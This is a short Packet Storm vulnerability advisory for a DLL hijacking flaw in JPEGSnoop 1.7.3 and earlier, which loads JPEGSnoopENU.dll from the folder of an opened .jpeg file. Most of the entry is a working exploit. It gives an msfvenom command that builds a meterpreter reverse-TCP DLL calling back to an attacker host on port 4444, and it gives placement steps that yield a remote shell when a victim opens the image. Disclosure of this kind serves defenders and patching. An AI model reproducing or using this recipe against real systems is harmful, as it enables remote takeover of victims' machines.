JPEGSnoop 1.7.3 DLL Hijacking

2016-04-08T00:00:00
ID PACKETSTORM:136623
Type packetstorm
Reporter Jeet Pandya
Modified 2016-04-08T00:00:00

Description

                                        
                                            `Software : JPEGSnoop  
  
  
Software Link: https://sourceforge.net/projects/jpegsnoop/  
  
Version: <= 1.7.3  
  
  
Tested on: WINDOWS XP 32 bit, WINDOWS 7 32 bit, Windows 8.1 32 bit  
  
  
JPEGSnoop suffers from DLL HIJACK Vulnerability from .jpeg file formats  
  
Vulnerable DLL: JPEGSnoopENU.dll  
  
  
  
Make Malicious dll :  
  
msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f dll LHOST=<HOST  
IP> LPORT=4444 > JPEGSnoopENU.dll  
  
Exploit:  
Place a dummy or original JPEG file having .jpeg extension file with  
the malicious dll. When the file is opened in JPEGSnoop you can get  
machines access and even the shell is also accessible from there.  
`